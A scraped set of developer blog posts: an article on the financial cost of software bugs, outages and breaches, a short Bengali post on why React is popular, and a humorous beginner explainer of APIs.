Let's look at the obvious bills first: the downtime and PR agony of a big, public software failure. Here are a few recent cautionary tales that illustrate the impact of a catastrophic failure or breach.
- The [big Facebook outage](https://en.wikipedia.org/wiki/2021_Facebook_outage) in 2021 was reported to cost [$65 million](https://www.forbes.com/sites/abrambrown/2021/10/05/facebook-outage-lost-revenue/) in advertising revenue, and (temporarily) tanked Mark Zuckerberg's personal wealth to the tune of $6 billion.
- Twitter has famously suffered an [ongoing series of outages](https://edition.cnn.com/2023/03/12/tech/twitter-breaking/index.html) since Elon Musk's extensive layoffs, during which period the stock price also [plummeted to a 3rd of its former value](https://www.theguardian.com/technology/2023/may/31/twitters-value-down-two-thirds-since-musk-takeover-says-investor).
- The [infamous SolarWinds attack](https://www.cybersecuritydive.com/news/solarwinds-1-year-later-cyber-attack-orion/610990/) cost **18,000 clients** an average of $12 million each. Impacted companies in the U.S. reported an average of a 14% impact on their annual revenue. SolarWinds itself had $40 million in upfront recovery costs, plus their stock plummeted from $25/share in 2020 to about $9.
- In September 2022, hackers stole **$160 million** from crypto platform Wintermute. In [March 2022](https://www.bleepingcomputer.com/news/security/hackers-stole-620-million-from-axie-infinity-via-fake-job-interviews/), hackers stole **$620 million in Ethereum** cryptocurrency fromm play-to-earn game Axie Infinity. In [June 2023](https://www.bleepingcomputer.com/news/security/atomic-wallet-hacks-lead-to-over-35-million-in-crypto-stolen/), hackers stole $35 million in crypto from Atomic Wallet.
While crypto is clearly a major target, it's far from the only one. According to Cybersecurity Ventures, cybercrime costs alone will reach [**$10.5 trillion annually**](https://www.embroker.com/blog/cyber-attack-statistics/#:~:text=of%20Cyber%20Attacks-,Costs%20of%20Cybercrime,of%20economic%20wealth%20in%20history.) by 2025, and the US will shoulder at least one-third of that cost.
## Additional Risk. Software errors and loss of investor trust
[Boeing's Starliner has suffered from problems](https://www.nytimes.com/2020/02/07/science/boeing-starliner-nasa.html) related to software errors since 2018, with two failed attempts to launch. Boeing has reported losses totaling $595 million related to the project, and their stock price has suffered significantly.
Investors made their displeasure known when [Slack outages showed up](https://www.cnbc.com/2019/09/05/slack-says-in-q2-earnings-that-outage-costs-were-one-time-issue.html) in their quarterly earnings, as they'd failed to meet the standards set out in their SLAs. The market responded with a chilly 14% drop in the stock valuation.
[British Airways wiped about $200M off their stock price](https://www.theguardian.com/business/2017/may/30/british-airways-ba-owner-drops-value-it-meltdown) when they stranded hundreds of passengers in airports during a major systems outage.
And to cite [just one of many](https://www.investors.com/news/tesla-stock-falls-after-362000-vehicle-recall-for-full-self-driving-flaws/) Tesla reliability headlines, Tesla stock fell 5.7% after announcing a major patch to 362,000 of their self-driving vehicles. The company's self-driving software has been plagued with widespread issues for years which have regularly chipped away at the stock price.
## [Software Bugs Examples]

### Government sector
You might think that in spacecraft engineering, there's a lot that could go wrong. Yes, that's right. Moreover, NASA had several failures because of the bug. On July 22, 1962, their spacecraft Mariner 1 probe heading toward Venus was destroyed just in 293 seconds after launch. Why did it happen? Engineers missed a hyphen in the code. Because of this, the spacecraft was **"wrecked by the most expensive hyphen in history."** The cost of program failure was $18.5 million in 1962. Today the cost of such a mistake could be approximately **$554 million.**
Did they learn the lesson and start to make better testing? Not so fast. In 1999, NASA's Mars Climate Orbiter got lost in space after a 286-day journey from Earth. Spacecraft orbited too close to Mars' surface and disintegrated. The reason was that one engineering team used English units of measurement (inches, feet, and pounds). In contrast, the other team used the more conventional metric system (millimeters, meters, and kilograms) for key operations. At the end of the project, two teams forgot to convert different systems into one. The cost of a bug in code is **$125 million.**
One more punch for NASA was the Genesis crash in 2004. It was meant to bring back space material from beyond Earth's moon. Genesis returned to Earth three years after takeoff with samples of the solar wind for analysis. But it didn't land smoothly. It crashed in Utah. As a result, many of the probe's precious samples were destroyed and polluted, though some were recovered. A NASA report released in 2009 said that Lockheed Martin workers had inverted the position of the probe's accelerometers. Hence, the spacecraft never knew it was decelerating into the Earth's atmosphere and, therefore, never deployed its parachute. This gap in testing cost NASA **over $260 million.**
### Commercial sector
#### PayPal

One of the largest online payment platforms in the world, PayPal, has also faced a lot of troubles because of software defects. One beautiful morning Chris Reynolds from Pennsylvania became reacher on a **$92 quadrillion** thanks to a smallPayPal error. They accidentally credit this amount of money to his account. What a surprise to Chris it was when he checked his monthly statement. But such an error was quickly recognized and fixed. By the time Chris Reynolds had logged in, his account had returned to zero.
One more severe security bug in PayPal that they have from 2021 **isn't fixed until today.** This new unpatched bug lets hackers steal money from PayPal users. With the help of this program defect, attackers can trick victims into unknowingly completing attacker-directed transactions with a single click.
#### Knight

What if some computer bug made you buy high and sell low? What if such a bug would cost you **$440 million**? Unreal? But that's exactly what happened to Knight, which nearly bankrupted them.
In 2012 Knight was the largest trader in the U.S., with average daily trading of over $21 billion. In August morning of that year, Knight activated a new trading software… with a bug. When New York Stock Exchange opened that day, the faulty software sent Knight on an acquisition spree. Soon it was buying shares in about 150 companies worth about **$7 billion in the first hour.**
According to the stock exchange rules, Knight must pay for those shares three days later, but they couldn't as they had no source of funds behind them. Of course, Knight tried to cancel the deal, but the chairman of the Securities and Exchange Commission, Mary Schapiro, refused. Only six stock transactions were reversed.
When Knight understood that the trades would stand, they had to save themselves by selling off the stocks for nothing. Goldman Sachs stepped in and bought all of Knight's unwanted positions for **$440 million.** By the next summer, the company was acquired by its competitor, Getco LLC. 17 years of dedicated work disappeared in less than one hour.
What went wrong? Several factors caused the failure. Yet, one of the most important was a flag that had previously been used to enable Power Peg was repurposed for use in new functionality. In other words, the program believed it was in a test environment and executed trades as quickly as possible without caring about losing the spread value.
The Security Exchange Commission's report highlighted many other factors. Yet, the critical factor was missing formal code review and unit QA process to check that the software had deployed correctly.
## **The Exponential Cost of Failure**
As seen above, best practices such as DevSecOps and automating SAST throughout the SDLC can produce significant savings by finding and fixing defects and vulnerabilities. The results are higher quality and more secure code that forms the foundation of the software applications or software powering devices. What you will see in this section is that there are other cost factors to consider when measuring the ROI of using SAST solution that are not as concrete to calculate.

The average enterprise _individual_ data breach costs a company $4.24 million, the highest average total cost in the 17-year history of IBM's annual ["Cost of a Data Breach Report"](https://www.ibm.com/security/data-breach) for 2021. While this seems astronomically high, you have to consider all the factors involved in solving such a breach. Not to mention the lasting damage to an organization's brand and reputation. In 2020, it was estimated that software defects of all kinds, including software vulnerabilities, [cost the economy $2 trillion](https://www.ciodive.com/news/poor-software-quality-report-2020/593015/). Unsurprisingly, this is due to software defects making their way through the entire software development phase to manifest in products delivered to customers.
Here are some things to consider when evaluating the real cost of security vulnerabilities and other software failures:
**Risk and liability** are high with safety critical devices such as critical infrastructure controls, medical and automotive systems, and aircraft electronics. Failure here could cause human injury or even death. The Prius brake issue turned out to be a software failure that [cost Toyota $5 billion](https://faculty.washington.edu/rbowen/cases/Toyota_Recall_case_April_2011.pdf) to remedy which included the recall of four million vehicles. The Boeing 737MAX accidents and grounding of the airplane is likely to [cost Boeing $19 billion](https://www.theguardian.com/business/2020/jan/29/boeing-puts-cost-of-737-max-crashes-at-19bn-as-it-slumps-to-annual-loss).
**Brand and reputation** might be difficult to monetize but it certainly is a large problem for corporations that have fallen afoul of a large security incident. The Equifax breach and the more recent Solar Winds supply chain attack are two prominent examples. Data breaches [increased by 17% in 2021](https://www.zdnet.com/article/the-biggest-data-breaches-of-2021/) with several high profile cases like zero day vulnerabilities in Microsoft Exchange Server and the [Log4J/Log4shell vulnerability](https://blogs.grammatech.com/log4j-2-vulnerability-practical-advice-and-whats-next-for-software-supply-chain-security).
**Customer experience** is a leading differentiator in many of today's applications. Poor implementation (design and coding defects), poor security and poor quality all result in poor customer experience. For example, performance can be a significant customer experience issue: Amazon found that for every [100ms of latency in their online applications costs them 1% in sales](https://www.gigaspaces.com/blog/amazon-found-every-100ms-of-latency-cost-them-1-in-sales). Google found that 500ms delay in search page results dropped traffic by 20%. Customers are flush with choices in today's market, customer experience is key in keeping them.
**Patching and recalls** are inevitable when serious security vulnerabilities or defects are found. In the Toyota case, they had to recall four million vehicles to patch their software. It's expensive to recall and patch your own software but you are also downloading huge costs on to your customers. Organizations are spending [thousands of hours and millions of dollars](https://www.computerweekly.com/news/252438578/Security-professionals-admit-patching-is-getting-harder) on patch management for software deployed in their environments. There is both an internal and external cost for security vulnerabilities and defects in software. Every unpatched piece of your code in customer's hands is a liability for them and you as it opens up new threat vectors.
**Compliance** , especially for public companies is a critical part of their business. Failure to manage the risk to your business due to security incidents can lead to heavy consequences from the Securities Exchange Commission (SEC) or Federal Trade Commission (FTC). For example, the Equifax data breach resulted in [$575 million fine](https://www.csoonline.com/article/3410278/the-biggest-data-breach-fines-penalties-and-settlements-so-far.html)s payable to the FTC and CFPB. The Home Depot breach was $200 million in fines and the Capital One breach resulted in $190 million. Note these fines are over and above every other cost and liability resulting from the breach.
**Cybersecurity insurance** coverage and premiums are beginning to be impacted by software quality, safety and security issues. Insurers will begin raising rates or possibly even denying coverage to organization not following DevSecOps best practices. The SolarWinds attack cost cyber insurance vendors more than [$90 million](https://www.crn.com/news/security/solarwinds-hack-could-cost-cyber-insurance-firms-90-million).
There is tremendous opportunity in reducing these downstream costs with improved software development, shifting security left and automating testing practices.
## [Economy AppSec\DevSecOps]

### Effect of software errors on developer labor costs
The time your developers spend finding and fixing bugs is time that costs the business money, plus the opportunity costs of not building new features. As we just covered above, finding and fixing bugs is a big-ticket item in your development lifecycle. So exactly how much does it cost you?
- According to VentureBeat, developers spend [20% of their time fixing bugs](https://venturebeat.com/2017/07/13/developers-spend-20-of-their-time-fixing-problems-and-its-killing-your-company/)
- The average salary for a Software Engineer in the USA is [hovering around $100,000](https://www.indeed.com/career/software-engineer/salaries?from=top_sb)
- That's about **$20,000/year spent on fixing software errors**, per developer
On top of developer salary expenses, unaddressed software errors affect end users, and when your product doesn't work as intended for your customers, support costs start to mount.
You should be aiming for this kind of reactive work (finding and fixing errors, support costs) to take no more than **20% of developer hours, allowing 80% on proactive work** (building features and improving your products) rather than vice versa. If we assume that your team adheres to this **80/20 standard**, based on a 40-hour work week, the average software developer spends **32 hours fixing errors** and replicating issues each month. If you have 50 developers, the combined **1,600 hours of reactive work** could potentially ramp up the cost of software errors to **US$83,000 in lost time per month.**
Then there's the opportunity costs of time spent away from building regular features for customers. Reducing **1,600 hours by 50% to 800 hours** would save your company **US$41,500 every month in salary expenses**, while increasing overall product and software quality.

### Impact of errors on developer turnover
If you're asking your development team to dedicate huge portions of their working life to the monotonous task of bug-fixing, you're not helping their job satisfaction. We've established that errors shouldn't occupy more than **20% of developer hours**, but there are some nasty stats that show a different reality:
- 26% of developers in a [global survey](https://www.businesswire.com/news/home/20210216005484/en/Rollbar-Research-Shows-That-Traditional-Error-Monitoring-Is-Missing-the-Mark) said that they spend half their time fixing bugs
- 10% in the Western U.S. said this occupies up to 75% of their time
- 44% called bug fixing their biggest pain point
- 55% said it kept them from building new features and functionality
- 12% felt "resentful" about manual bug-fixing
- 7% said it makes them want to quit.
This is especially confronting given that the tech sector has the [highest staff attrition rates of any industry](https://brainhub.eu/library/how-to-lose-developers), and within this, software engineers have an even higher turnover [rate of 21.7%](https://www.growin.com/blog/developer-retention-costs-onboarding/) (for context, the average across all industries is 10.9%). Plus, the business cost to hire a developer [averages $50,000.](https://devskiller.com/true-cost-of-recruiting-a-developer-infographic/)
The upshot? It's a very good investment to give your development team the right tools so that they can spend less time digging through log files and more time doing rewarding work. Plus, this means they're building new features that strengthen your market offering, so it's a win-win.
### Cost of Fixing Bugs
Bugs in code should be found and fixed during the testing phase of the web development life cycle. Otherwise, the real impact of software bugs might cost more than we can imagine. For example, the research of the [Systems Sciences Institute](https://www.researchgate.net/figure/IBM-System-Science-Institute-Relative-Cost-of-Fixing-Defects_fig1_255965523) at IBM shows that the cost to fix an error found after a product release costs **from 4x to 5x times more** than the one uncovered during the design stage. Moreover, it costs **100x times more** when software bugs are identified in the maintenance phase.

Clearly, it's harder to fix issues when the product is launched and released. **The later bugs are tracked, the more negative consequences they have and the more complicated they can be to resolve.** Furthermore, late and slow bug fixing can affect product functionality and brand image. Moreover, late bug fixing causes further code changes that might conflict with the initial one – adding to the cost, time, and effort. So it's essential to track and fix bugs during the early stages of development.
### How Much Would Bug Fixing Cost You?
In one of our previous articles, **"How to hire a dedicated development team: 9 steps to simplify the hiring process"** – read [here](https://amgrade.com/how-to-hire-a-dedicated-development-team-9-steps-to-simplify-the-hiring-process/), we showed statistics on the average hourly rate of software development worldwide. Due to this data, we can calculate **how much bug fixes cost globally.**
The average time to fix the functional (major level) bug before the launch stage is around 12 hours. So, to count the cost of fixing a bug, we take the developer's hourly rate multiplied by the time to fix it. Here is what we received:
| North America | $80\*12h = **$960** |
| --- | --- |
| Western Europe | $75\*12h = **$900** |
| Eastern Europe | $55\*12h = **$660** |
| Africa | $31\*12h = **$372** |
| Asia Pacific | $28\*12h = **$336** |
Now it would be much easier to calculate and understand the cost of the bug fixes in the maintenance phase. Simply **multiply all those numbers by x100.**
The high cost of late bug fixing is not the only problem. Business owners should consider that fixing bugs in the already released product causes **a domino effect.** When developers begin to change and fix one part of the code, it ripples on other parts of software code, sometimes even on the website design. Thus, delinquent bug fixing might provoke the second round of SDLC , adding an extra cost to that code change.
Due to late bug fixes, your customers receive a slow and buggy application. You lost your revenue. Moreover, instead of releasing new product features, improving user experience, and moving forward in product development, the engineering team stucks in the fixing process.
According to the [CPSQ report](https://www.it-cisq.org/pdf/CPSQ-2020-report.pdf), in 2020, the total Cost of Poor Software Quality in the US was **$2.08 trillion** , and here you can add minus customer interest, plus failed IT projects and time lost. To avoid failure of a new project, we should strive for about **20% reactive work** (finding and fixing defects, support) and **80% proactive work** (building new features and improving our product). If you delay bug fixing, you start a snowball effect and get 80% reactive work compared to only 20% proactive.
As a matter of fact, delayed bugfixes can affect everything in your business project. It starts from **budget overruns, low revenue** and results in **indirect costs** like customer loyalty, brand reputation, wasted time, and the slow death of a project.
The total cost of software bugs can be hard to specify, but a detailed understanding of what software bugs is, and their impact on your business is the first step to reducing wasteful spending. Prioritizing, timely fixing, and focusing on critical errors profits with a successful project and reduces costs.
## Experts' opinion
The cleanup cost for fixing a bug in a homegrown Web application ranges anywhere from **$400 to $4,000 to repair**, depending on the vulnerability and the way it's fixed.
Security experts traditionally have been hesitant to calculate the actual cost associated with bug fixes because there are so many variables, including the severity of the vulnerability, differences in man-hour rates, and the makeup of the actual fix.
John Steven, senior director for advanced technology consulting at Cigital, says Grossman's numbers are "dead on." "Cross-site scripting costs very little to fix, for instance, but the regression rate and 'new findings' rates are very high," says Steven, who has done some number-crunching of his own.
Stevens says security remediation typically occurs outside of the normal development and quality-assurance cycle. It costs an organization about **$250** to understand a vulnerability finding, **$300** to communicate a vulnerability internally and to get "action," and around **$240** to verify the fix itself, he says. A simple bug can take about an hour and a half to fix, he says, or $160, for example, at about $105 per man-hour.
"Endemic problems, like authorization, that require integration with tools take more like **80 to 100 hours**," Stevens says, so Grossman's estimate for those cases is right on target, he says.
With XSS, enterprises aren't typically fixing just one XSS bug at a time, either. "Developers tend to fix in batches. So no one fixes [just] one cross-site scripting [bug]," Stevens says. Instead, it's more like eight to 20 at a time, he adds, and while some bugs only cost about $400 to fix, others can cost **$9,000 to $11,000 **to fix.
A cross-site request forgery (CSRF) vulnerability that requires encryption can require **80 to 100 man-hours** of resources to repair, he says. But a low-budget **$400 XSS fix** is likely to cause more problems later. "Retests will uncover related problems or the same problem elsewhere as a result of that kind of 'fix,'" Stevens says.
Still, large sites are facing a major reality check in the costs associated with cleaning up their bugs: WhiteHat's Grossman says it's safe to say that most Websites today are full of vulnerabilities, and finding them is a major challenge. The cost of finding those bugs depends on the route an enterprise takes, whether it's a one-time consultant's vulnerability assessment of $10,000 per site, or a much less expensive vulnerability scan, which is somewhere around $1,000. And that's just finding the bugs, not fixing them, Grossman says.
---
Next reading **AppSec and DevSecOps: part 2 - cost of a bug, cases, effectiveness assessment, ROI** will be soon.. | d3one |
1,663,997 | React কেন বর্তমানে বেশি জনপ্রিয়? | May 29, 2013, প্রথম রিলিজ হওয়ার পরেও React বর্তমানে বেশি জনপ্রিয় UI লাইব্রেরি। অত্যন্ত জনপ্রিয়... | 0 | 2023-11-11T18:18:24 | https://dev.to/samiulalimsaad/react-ken-brtmaane-beshi-jnpriyy-4k1f | react, javascript, programming | May 29, 2013, প্রথম রিলিজ হওয়ার পরেও React বর্তমানে বেশি জনপ্রিয় UI লাইব্রেরি। অত্যন্ত জনপ্রিয় হওয়ার হওয়ার বেশ কয়েকটি কারণ রয়েছে। এই কারণগুলির মধ্যে রয়েছে:
**Performance**: React শুধুমাত্র সেই অংশগুলিকে পুনরায় রেন্ডার করে যা প্রয়োজন, যা ওয়েব অ্যাপ্লিকেশনগুলিকে আরও fast এবং আরও efficient করে তোলে।
**Community & support**: React এর একটি শক্তিশালী Community রয়েছে। এই Community টি ডেভেলপারদের জন্য বিভিন্ন রিসোর্স এবং সহায়তা প্রদান করে, যার মধ্যে রয়েছে ডকুমেন্টেশন, টিউটোরিয়াল, এবং প্যাকেজ। এটি ডেভেলপারদের সমস্যা সমাধান এবং নতুন concept শিখতে সহায়তা করে।
**Easy to learn**: React শিখতে তুলনামূলকভাবে সহজ। এটি ডেভেলপারদের নতুন প্রযুক্তিতে দ্রুত adapt করতে সহায়তা করে।
**Flexibility**: React একটি অত্যন্ত flexible লাইব্রেরি যা বিভিন্ন ধরণের ওয়েব অ্যাপ্লিকেশন তৈরি করতে ব্যবহার করা যায়। এটি ডেভেলপারদের তাদের প্রয়োজনীয় অ্যাপ্লিকেশন তৈরি করতে সহায়তা করে।
**Possibility**: React একটি শক্তিশালী এবং বহুমুখী লাইব্রেরি যা বিভিন্ন ধরণের ওয়েব অ্যাপ্লিকেশন তৈরি করতে ব্যবহার করা যেতে পারে। এটি একটি জনপ্রিয় পছন্দ হয়ে উঠেছে এমন কিছু অ্যাপ্লিকেশনের মধ্যে রয়েছে সোশ্যাল মিডিয়া অ্যাপ্লিকেশন, ই-কমার্স অ্যাপ্লিকেশন, এবং গেমস। এছাড়াও React কে client সাইডে, android app অথবা ios app, browser এক্সটেনশন তৈরিতে অথবা ElectronJs এর মাধ্যমে ডেক্সটপ অ্যাপ তৈরি করার ক্ষেত্রেও ইউজ করা হয়।
এছাড়াও React লাইব্রেরিটি Facebook মেনটেইন করে এবং এটা open source । এসব কারণ গুলোর জন্য React বর্তমানে বেশি জনপ্রিয়।
| samiulalimsaad |
1,664,279 | API Explained to a 5 year old kid LITERALLY! | Disclaimer This is a blog to explain topics in a funny way and I don't intend to hurt... | 0 | 2023-11-12T05:04:42 | https://dev.to/maiommhoon/api-explained-to-a-5-year-old-kid-literally-5306 | api, webdev, beginners | ## Disclaimer
**This is a blog to explain topics in a funny way and I don't intend to hurt anyone's feelings**
## Introduction
What is an API? Well, it's Application programming interface.
(*gasp*) F**k that a huge word! No problem we will calmly ask google.

So, I searched it and scanned/read many documents and here's what it means...
## Explained - LITERALLY TO A 5 YEARS OLD KID
OK! So, imagine you are a 5 year old kid! Nice now you are stupid I feel superior!
So, you have 7 crayons and you want to give it to your friend who is in next room! Now, if you are little bit smart you won't give it one by one going to his room and give it, rather you will put them in a box ( cuz you have small hands and crayons are large ) and give it to him!
Here, you are the user aka stupid , your friend is the application from where you want to pass the data and box is the API!
## Explained - Other common EXAMPLE
AGAIN! Imagine you are in a restaurant and you want to order food but you won't go directly to the chef and ask them to make you the food you want, rather you will call the waiter and say him your order which he will take to the chef! SIMPLE!
Here, You are the Customer aka User, Chef is the Application and API will be the Waiter aka low waged person!
## REAL LIFE EXAMPLE - UbeR
Let's take a look into a real life example because we are not schools.
Now, Uber seems one application but Behind the Scenes it is the mixture of many service application like Payment , Order , etc.
[ This Distributing work into smaller parts is called **Microservice Architecture** but more on that in other blogs ]
Now, to communicate through their apps they have to pass data through API!
It's like they Talking with each other with API like calls, letter and emails.
BUT FOR YOU IT IS ONE APPLICATION!

| maiommhoon |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.